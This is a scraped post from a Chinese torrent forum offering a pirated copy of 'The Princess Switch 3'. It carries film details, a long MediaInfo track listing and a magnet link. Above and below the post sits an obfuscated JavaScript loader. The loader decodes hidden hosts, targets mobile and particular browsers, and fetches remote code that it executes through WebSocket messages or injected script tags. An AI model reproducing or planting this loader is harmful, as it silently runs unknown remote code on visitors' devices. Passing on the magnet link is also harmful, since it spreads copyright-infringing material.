公主大对换:浪漫之星[中文字幕].The.Princess.Switch.3.Romancing.the.Star.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 8.97GB

版主小s 13天前 252

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 公主大对换:浪漫之星 / 公主大对换3 / 兜乱公主闯情关3(港) / 公主闹双包3(台) / 公主大对换 3:浪漫满星 / 公主闹双包 3:浪漫星空(台) / 兜乱公主闯情关 3:浪漫星辰(港)

◎片 名 The Princess Switch 3: Romancing The Star

◎年 代 2021

◎产 地 美国

◎类 别 剧情 / 喜剧 / 爱情 / 家庭

◎语 言 英语

◎上映日期 2021-11-18(美国)

◎IMDb链接 https://www.imdb.com/title/tt14731142/

◎豆瓣评分 5.6/10 (82人评价)

◎豆瓣链接 https://movie.douban.com/subject/35636177/

◎片 长 106分钟

◎导 演 麦克·罗尔 Mike Rohl (id:1295936)

◎编 剧 罗宾·伯恩海姆 Robin Bernheim (id:1404989)

◎演 员 凡妮莎·哈金斯 Vanessa Hudgens (id:1025150)

尼克·萨加 Nick Sagar (id:1404991)

瑞米·许 Remy Hii (id:1332456)

阿曼达·多诺休 Amanda Donohoe (id:1055455)

苏南·布劳恩 Suanne Braun (id:1071829)

弗劳伦斯·霍尔 Florence Hall (id:1328799)

◎标 签 美国 / 爱情 / 美国电影 / 圣诞 / netflix / 喜剧 / 电影 / 2021

◎简 介

一件无价之宝被盗后,玛格丽特女王和史黛西公主向长得酷似女王的皇室表亲菲奥娜求援。这名作风大胆的女郎将和一位神秘潇洒的老相识搭档以寻回失物,没想到两人在甜蜜浪漫的圣诞氛围中重新擦出火花,并引发了一次出人意料的对换。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 46588936248848754163941049460843276812 (0x230CB3E6C2C4AAF86D620B25058EEA0C)

  4. Complete name : The.Princess.Switch.3.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.97 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.1 Mb/s

  11. Encoded date : UTC 2021-11-21 00:04:18

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 4 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 4 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 46 min

  24. Bit rate mode : Variable

  25. Bit rate : 2 997 kb/s

  26. Maximum bit rate : 20.0 Mb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.060

  37. Stream size : 2.22 GiB (25%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=17.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 1 h 46 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 583 MiB (6%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 1 h 46 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 486 MiB (5%)

  81. Title : Czech

  82. Language : Czech

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 1 h 46 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 486 MiB (5%)

  101. Title : French

  102. Language : French

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 1 h 46 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 486 MiB (5%)

  121. Title : German

  122. Language : German

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 1 h 46 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 486 MiB (5%)

  141. Title : Hungarian

  142. Language : Hungarian

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 1 h 46 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 486 MiB (5%)

  161. Title : Italian

  162. Language : Italian

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Audio #7

  167. ID : 8

  168. Format : E-AC-3

  169. Format/Info : Enhanced AC-3

  170. Commercial name : Dolby Digital Plus

  171. Codec ID : A_EAC3

  172. Duration : 1 h 46 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 486 MiB (5%)

  181. Title : Japanese

  182. Language : Japanese

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No


  186. Audio #8

  187. ID : 9

  188. Format : E-AC-3

  189. Format/Info : Enhanced AC-3

  190. Commercial name : Dolby Digital Plus

  191. Codec ID : A_EAC3

  192. Duration : 1 h 46 min

  193. Bit rate mode : Constant

  194. Bit rate : 640 kb/s

  195. Channel(s) : 6 channels

  196. Channel layout : L R C LFE Ls Rs

  197. Sampling rate : 48.0 kHz

  198. Frame rate : 31.250 FPS (1536 SPF)

  199. Compression mode : Lossy

  200. Stream size : 486 MiB (5%)

  201. Title : Polish

  202. Language : Polish

  203. Service kind : Complete Main

  204. Default : No

  205. Forced : No


  206. Audio #9

  207. ID : 10

  208. Format : E-AC-3

  209. Format/Info : Enhanced AC-3

  210. Commercial name : Dolby Digital Plus

  211. Codec ID : A_EAC3

  212. Duration : 1 h 46 min

  213. Bit rate mode : Constant

  214. Bit rate : 640 kb/s

  215. Channel(s) : 6 channels

  216. Channel layout : L R C LFE Ls Rs

  217. Sampling rate : 48.0 kHz

  218. Frame rate : 31.250 FPS (1536 SPF)

  219. Compression mode : Lossy

  220. Stream size : 486 MiB (5%)

  221. Title : Brazilian Portuguese

  222. Language : Portuguese

  223. Service kind : Complete Main

  224. Default : No

  225. Forced : No


  226. Audio #10

  227. ID : 11

  228. Format : E-AC-3

  229. Format/Info : Enhanced AC-3

  230. Commercial name : Dolby Digital Plus

  231. Codec ID : A_EAC3

  232. Duration : 1 h 46 min

  233. Bit rate mode : Constant

  234. Bit rate : 640 kb/s

  235. Channel(s) : 6 channels

  236. Channel layout : L R C LFE Ls Rs

  237. Sampling rate : 48.0 kHz

  238. Frame rate : 31.250 FPS (1536 SPF)

  239. Compression mode : Lossy

  240. Stream size : 486 MiB (5%)

  241. Title : Russian

  242. Language : Russian

  243. Service kind : Complete Main

  244. Default : No

  245. Forced : No


  246. Audio #11

  247. ID : 12

  248. Format : E-AC-3

  249. Format/Info : Enhanced AC-3

  250. Commercial name : Dolby Digital Plus

  251. Codec ID : A_EAC3

  252. Duration : 1 h 46 min

  253. Bit rate mode : Constant

  254. Bit rate : 640 kb/s

  255. Channel(s) : 6 channels

  256. Channel layout : L R C LFE Ls Rs

  257. Sampling rate : 48.0 kHz

  258. Frame rate : 31.250 FPS (1536 SPF)

  259. Compression mode : Lossy

  260. Stream size : 486 MiB (5%)

  261. Title : Spanish

  262. Language : Spanish

  263. Service kind : Complete Main

  264. Default : No

  265. Forced : No


  266. Audio #12

  267. ID : 13

  268. Format : E-AC-3

  269. Format/Info : Enhanced AC-3

  270. Commercial name : Dolby Digital Plus

  271. Codec ID : A_EAC3

  272. Duration : 1 h 46 min

  273. Bit rate mode : Constant

  274. Bit rate : 640 kb/s

  275. Channel(s) : 6 channels

  276. Channel layout : L R C LFE Ls Rs

  277. Sampling rate : 48.0 kHz

  278. Frame rate : 31.250 FPS (1536 SPF)

  279. Compression mode : Lossy

  280. Stream size : 486 MiB (5%)

  281. Title : European Spanish

  282. Language : Spanish

  283. Service kind : Complete Main

  284. Default : No

  285. Forced : No


  286. Audio #13

  287. ID : 14

  288. Format : E-AC-3

  289. Format/Info : Enhanced AC-3

  290. Commercial name : Dolby Digital Plus

  291. Codec ID : A_EAC3

  292. Duration : 1 h 46 min

  293. Bit rate mode : Constant

  294. Bit rate : 640 kb/s

  295. Channel(s) : 6 channels

  296. Channel layout : L R C LFE Ls Rs

  297. Sampling rate : 48.0 kHz

  298. Frame rate : 31.250 FPS (1536 SPF)

  299. Compression mode : Lossy

  300. Stream size : 486 MiB (5%)

  301. Title : Thai

  302. Language : Thai

  303. Service kind : Complete Main

  304. Default : No

  305. Forced : No


  306. Audio #14

  307. ID : 15

  308. Format : E-AC-3

  309. Format/Info : Enhanced AC-3

  310. Commercial name : Dolby Digital Plus

  311. Codec ID : A_EAC3

  312. Duration : 1 h 46 min

  313. Bit rate mode : Constant

  314. Bit rate : 640 kb/s

  315. Channel(s) : 6 channels

  316. Channel layout : L R C LFE Ls Rs

  317. Sampling rate : 48.0 kHz

  318. Frame rate : 31.250 FPS (1536 SPF)

  319. Compression mode : Lossy

  320. Stream size : 486 MiB (5%)

  321. Title : Turkish

  322. Language : Turkish

  323. Service kind : Complete Main

  324. Default : No

  325. Forced : No


  326. Text #1

  327. ID : 16

  328. Format : UTF-8

  329. Codec ID : S_TEXT/UTF8

  330. Codec ID/Info : UTF-8 Plain Text

  331. Duration : 1 h 44 min

  332. Bit rate : 104 b/s

  333. Count of elements : 1838

  334. Stream size : 79.5 KiB (0%)

  335. Title : English

  336. Language : English

  337. Default : Yes

  338. Forced : No


  339. Text #2

  340. ID : 17

  341. Format : UTF-8

  342. Codec ID : S_TEXT/UTF8

  343. Codec ID/Info : UTF-8 Plain Text

  344. Duration : 2 s 458 ms

  345. Bit rate : 52 b/s

  346. Count of elements : 1

  347. Stream size : 16.0 Bytes (0%)

  348. Title : English (Forced)

  349. Language : English

  350. Default : No

  351. Forced : Yes


  352. Text #3

  353. ID : 18

  354. Format : UTF-8

  355. Codec ID : S_TEXT/UTF8

  356. Codec ID/Info : UTF-8 Plain Text

  357. Duration : 1 h 44 min

  358. Bit rate : 95 b/s

  359. Count of elements : 1299

  360. Stream size : 72.9 KiB (0%)

  361. Title : Arabic

  362. Language : Arabic

  363. Default : No

  364. Forced : No


  365. Text #4

  366. ID : 19

  367. Format : UTF-8

  368. Codec ID : S_TEXT/UTF8

  369. Codec ID/Info : UTF-8 Plain Text

  370. Duration : 1 h 44 min

  371. Bit rate : 59 b/s

  372. Count of elements : 1278

  373. Stream size : 45.1 KiB (0%)

  374. Title : Chinese Simplified

  375. Language : Chinese

  376. Default : No

  377. Forced : No


  378. Text #5

  379. ID : 20

  380. Format : UTF-8

  381. Codec ID : S_TEXT/UTF8

  382. Codec ID/Info : UTF-8 Plain Text

  383. Duration : 1 h 44 min

  384. Bit rate : 55 b/s

  385. Count of elements : 1392

  386. Stream size : 42.6 KiB (0%)

  387. Title : Chinese Traditional

  388. Language : Chinese

  389. Default : No

  390. Forced : No


  391. Text #6

  392. ID : 21

  393. Format : UTF-8

  394. Codec ID : S_TEXT/UTF8

  395. Codec ID/Info : UTF-8 Plain Text

  396. Duration : 1 h 44 min

  397. Bit rate : 49 b/s

  398. Count of elements : 1343

  399. Stream size : 37.7 KiB (0%)

  400. Title : Croatian

  401. Language : Croatian

  402. Default : No

  403. Forced : No


  404. Text #7

  405. ID : 22

  406. Format : UTF-8

  407. Codec ID : S_TEXT/UTF8

  408. Codec ID/Info : UTF-8 Plain Text

  409. Duration : 1 h 44 min

  410. Bit rate : 53 b/s

  411. Count of elements : 1327

  412. Stream size : 40.6 KiB (0%)

  413. Title : Czech

  414. Language : Czech

  415. Default : No

  416. Forced : No


  417. Text #8

  418. ID : 23

  419. Format : UTF-8

  420. Codec ID : S_TEXT/UTF8

  421. Codec ID/Info : UTF-8 Plain Text

  422. Duration : 1 h 44 min

  423. Bit rate : 50 b/s

  424. Count of elements : 1266

  425. Stream size : 38.8 KiB (0%)

  426. Title : Danish

  427. Language : Danish

  428. Default : No

  429. Forced : No


  430. Text #9

  431. ID : 24

  432. Format : UTF-8

  433. Codec ID : S_TEXT/UTF8

  434. Codec ID/Info : UTF-8 Plain Text

  435. Duration : 1 h 44 min

  436. Bit rate : 48 b/s

  437. Count of elements : 1229

  438. Stream size : 37.3 KiB (0%)

  439. Title : Dutch

  440. Language : Dutch

  441. Default : No

  442. Forced : No


  443. Text #10

  444. ID : 25

  445. Format : UTF-8

  446. Codec ID : S_TEXT/UTF8

  447. Codec ID/Info : UTF-8 Plain Text

  448. Duration : 1 h 44 min

  449. Bit rate : 53 b/s

  450. Count of elements : 1165

  451. Stream size : 40.8 KiB (0%)

  452. Title : Finnish

  453. Language : Finnish

  454. Default : No

  455. Forced : No


  456. Text #11

  457. ID : 26

  458. Format : UTF-8

  459. Codec ID : S_TEXT/UTF8

  460. Codec ID/Info : UTF-8 Plain Text

  461. Duration : 1 h 44 min

  462. Bit rate : 56 b/s

  463. Count of elements : 1287

  464. Stream size : 42.9 KiB (0%)

  465. Title : French

  466. Language : French

  467. Default : No

  468. Forced : No


  469. Text #12

  470. ID : 27

  471. Format : UTF-8

  472. Codec ID : S_TEXT/UTF8

  473. Codec ID/Info : UTF-8 Plain Text

  474. Duration : 1 h 44 min

  475. Bit rate : 51 b/s

  476. Count of elements : 1231

  477. Stream size : 39.5 KiB (0%)

  478. Title : German

  479. Language : German

  480. Default : No

  481. Forced : No


  482. Text #13

  483. ID : 28

  484. Format : UTF-8

  485. Codec ID : S_TEXT/UTF8

  486. Codec ID/Info : UTF-8 Plain Text

  487. Duration : 1 h 44 min

  488. Bit rate : 94 b/s

  489. Count of elements : 1289

  490. Stream size : 72.4 KiB (0%)

  491. Title : Greek

  492. Language : Greek

  493. Default : No

  494. Forced : No


  495. Text #14

  496. ID : 29

  497. Format : UTF-8

  498. Codec ID : S_TEXT/UTF8

  499. Codec ID/Info : UTF-8 Plain Text

  500. Duration : 1 h 40 min

  501. Bit rate : 88 b/s

  502. Count of elements : 1257

  503. Stream size : 65.3 KiB (0%)

  504. Title : Hebrew

  505. Language : Hebrew

  506. Default : No

  507. Forced : No


  508. Text #15

  509. ID : 30

  510. Format : UTF-8

  511. Codec ID : S_TEXT/UTF8

  512. Codec ID/Info : UTF-8 Plain Text

  513. Duration : 1 h 44 min

  514. Bit rate : 54 b/s

  515. Count of elements : 1294

  516. Stream size : 41.7 KiB (0%)

  517. Title : Hungarian

  518. Language : Hungarian

  519. Default : No

  520. Forced : No


  521. Text #16

  522. ID : 31

  523. Format : UTF-8

  524. Codec ID : S_TEXT/UTF8

  525. Codec ID/Info : UTF-8 Plain Text

  526. Duration : 1 h 44 min

  527. Bit rate : 52 b/s

  528. Count of elements : 1294

  529. Stream size : 40.3 KiB (0%)

  530. Title : Indonesian

  531. Language : Indonesian

  532. Default : No

  533. Forced : No


  534. Text #17

  535. ID : 32

  536. Format : UTF-8

  537. Codec ID : S_TEXT/UTF8

  538. Codec ID/Info : UTF-8 Plain Text

  539. Duration : 1 h 44 min

  540. Bit rate : 51 b/s

  541. Count of elements : 1283

  542. Stream size : 39.5 KiB (0%)

  543. Title : Italian

  544. Language : Italian

  545. Default : No

  546. Forced : No


  547. Text #18

  548. ID : 33

  549. Format : UTF-8

  550. Codec ID : S_TEXT/UTF8

  551. Codec ID/Info : UTF-8 Plain Text

  552. Duration : 1 h 44 min

  553. Bit rate : 56 b/s

  554. Count of elements : 1353

  555. Stream size : 42.8 KiB (0%)

  556. Title : Japanese

  557. Language : Japanese

  558. Default : No

  559. Forced : No


  560. Text #19

  561. ID : 34

  562. Format : UTF-8

  563. Codec ID : S_TEXT/UTF8

  564. Codec ID/Info : UTF-8 Plain Text

  565. Duration : 1 h 44 min

  566. Bit rate : 71 b/s

  567. Count of elements : 1292

  568. Stream size : 54.3 KiB (0%)

  569. Title : Korean

  570. Language : Korean

  571. Default : No

  572. Forced : No


  573. Text #20

  574. ID : 35

  575. Format : UTF-8

  576. Codec ID : S_TEXT/UTF8

  577. Codec ID/Info : UTF-8 Plain Text

  578. Duration : 1 h 44 min

  579. Bit rate : 52 b/s

  580. Count of elements : 1241

  581. Stream size : 40.0 KiB (0%)

  582. Title : Malay

  583. Language : Malay

  584. Default : No

  585. Forced : No


  586. Text #21

  587. ID : 36

  588. Format : UTF-8

  589. Codec ID : S_TEXT/UTF8

  590. Codec ID/Info : UTF-8 Plain Text

  591. Duration : 1 h 44 min

  592. Bit rate : 53 b/s

  593. Count of elements : 1203

  594. Stream size : 40.7 KiB (0%)

  595. Title : Norwegian Bokmal

  596. Language : Norwegian Bokmal

  597. Default : No

  598. Forced : No


  599. Text #22

  600. ID : 37

  601. Format : UTF-8

  602. Codec ID : S_TEXT/UTF8

  603. Codec ID/Info : UTF-8 Plain Text

  604. Duration : 1 h 44 min

  605. Bit rate : 51 b/s

  606. Count of elements : 1254

  607. Stream size : 39.2 KiB (0%)

  608. Title : Polish

  609. Language : Polish

  610. Default : No

  611. Forced : No


  612. Text #23

  613. ID : 38

  614. Format : UTF-8

  615. Codec ID : S_TEXT/UTF8

  616. Codec ID/Info : UTF-8 Plain Text

  617. Duration : 1 h 44 min

  618. Bit rate : 51 b/s

  619. Count of elements : 1266

  620. Stream size : 39.5 KiB (0%)

  621. Title : Portuguese

  622. Language : Portuguese

  623. Default : No

  624. Forced : No


  625. Text #24

  626. ID : 39

  627. Format : UTF-8

  628. Codec ID : S_TEXT/UTF8

  629. Codec ID/Info : UTF-8 Plain Text

  630. Duration : 1 h 44 min

  631. Bit rate : 55 b/s

  632. Count of elements : 1302

  633. Stream size : 42.2 KiB (0%)

  634. Title : Brazilian Portuguese

  635. Language : Portuguese

  636. Default : No

  637. Forced : No


  638. Text #25

  639. ID : 40

  640. Format : UTF-8

  641. Codec ID : S_TEXT/UTF8

  642. Codec ID/Info : UTF-8 Plain Text

  643. Duration : 1 h 44 min

  644. Bit rate : 60 b/s

  645. Count of elements : 1259

  646. Stream size : 45.8 KiB (0%)

  647. Title : Romanian

  648. Language : Romanian

  649. Default : No

  650. Forced : No


  651. Text #26

  652. ID : 41

  653. Format : UTF-8

  654. Codec ID : S_TEXT/UTF8

  655. Codec ID/Info : UTF-8 Plain Text

  656. Duration : 1 h 44 min

  657. Bit rate : 90 b/s

  658. Count of elements : 1295

  659. Stream size : 68.9 KiB (0%)

  660. Title : Russian

  661. Language : Russian

  662. Default : No

  663. Forced : No


  664. Text #27

  665. ID : 42

  666. Format : UTF-8

  667. Codec ID : S_TEXT/UTF8

  668. Codec ID/Info : UTF-8 Plain Text

  669. Duration : 1 h 44 min

  670. Bit rate : 53 b/s

  671. Count of elements : 1327

  672. Stream size : 41.0 KiB (0%)

  673. Title : Spanish

  674. Language : Spanish

  675. Default : No

  676. Forced : No


  677. Text #28

  678. ID : 43

  679. Format : UTF-8

  680. Codec ID : S_TEXT/UTF8

  681. Codec ID/Info : UTF-8 Plain Text

  682. Duration : 1 h 44 min

  683. Bit rate : 54 b/s

  684. Count of elements : 1258

  685. Stream size : 41.6 KiB (0%)

  686. Title : European Spanish

  687. Language : Spanish

  688. Default : No

  689. Forced : No


  690. Text #29

  691. ID : 44

  692. Format : UTF-8

  693. Codec ID : S_TEXT/UTF8

  694. Codec ID/Info : UTF-8 Plain Text

  695. Duration : 1 h 44 min

  696. Bit rate : 51 b/s

  697. Count of elements : 1199

  698. Stream size : 39.3 KiB (0%)

  699. Title : Swedish

  700. Language : Swedish

  701. Default : No

  702. Forced : No


  703. Text #30

  704. ID : 45

  705. Format : UTF-8

  706. Codec ID : S_TEXT/UTF8

  707. Codec ID/Info : UTF-8 Plain Text

  708. Duration : 1 h 44 min

  709. Bit rate : 144 b/s

  710. Count of elements : 1303

  711. Stream size : 110 KiB (0%)

  712. Title : Thai

  713. Language : Thai

  714. Default : No

  715. Forced : No


  716. Text #31

  717. ID : 46

  718. Format : UTF-8

  719. Codec ID : S_TEXT/UTF8

  720. Codec ID/Info : UTF-8 Plain Text

  721. Duration : 1 h 44 min

  722. Bit rate : 51 b/s

  723. Count of elements : 1229

  724. Stream size : 39.4 KiB (0%)

  725. Title : Turkish

  726. Language : Turkish

  727. Default : No

  728. Forced : No


  729. Text #32

  730. ID : 47

  731. Format : UTF-8

  732. Codec ID : S_TEXT/UTF8

  733. Codec ID/Info : UTF-8 Plain Text

  734. Duration : 1 h 44 min

  735. Bit rate : 86 b/s

  736. Count of elements : 1273

  737. Stream size : 65.9 KiB (0%)

  738. Title : Ukrainian

  739. Language : Ukrainian

  740. Default : No

  741. Forced : No


  742. Text #33

  743. ID : 48

  744. Format : UTF-8

  745. Codec ID : S_TEXT/UTF8

  746. Codec ID/Info : UTF-8 Plain Text

  747. Duration : 1 h 44 min

  748. Bit rate : 72 b/s

  749. Count of elements : 1194

  750. Stream size : 55.0 KiB (0%)

  751. Title : Vietnamese

  752. Language : Vietnamese

  753. Default : No

  754. Forced : No




复制代码


TAGS 剧情 喜剧 爱情 家庭

磁力链:
  • magnet:?xt=urn:btih:365A13FB80FC9D03BEEF5F2D4E880CA19ADAAB41

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};